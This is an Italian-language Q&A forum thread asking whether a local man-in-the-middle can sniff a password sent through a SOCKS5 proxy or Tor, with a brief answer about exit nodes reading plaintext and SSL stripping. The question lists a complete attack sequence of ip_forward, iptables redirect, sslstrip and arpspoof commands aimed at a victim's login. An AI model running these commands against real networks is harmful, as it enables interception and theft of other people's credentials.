Come può un utente malintenzionato annusare una password con il proxy SOCKS5?

2

Devo temere un aggressore locale man-in-the-middle mentre inserisco la password con tor?

Dire che una vittima si sta connettendo a Facebook con il browser.

In che modo un utente malintenzionato può creare un attacco man-in-the-middle che ottiene la sua password? (quali comandi precisi)

Se non viene utilizzato alcun proxy, l'autore dell'attacco utilizzerà

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p  tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0  -t < targetIP > < gatewayIP > 
arpspoof -i eth0  -t < gatewayIP > < targetIP>
    
posta user123456 07.12.2016 - 02:07
fonte

1 risposta

1

Ho fatto un post sul blog qui nel 2012: link

Il fatto è che un utente malintenzionato può effettivamente lanciare attacchi come lei menziona. Il nodo di uscita sarà sempre in grado di leggere il traffico del testo in chiaro e forse anche di eseguire attacchi simili a strip SSL.

    
risposta data 07.12.2016 - 03:18
fonte

Leggi altre domande sui tag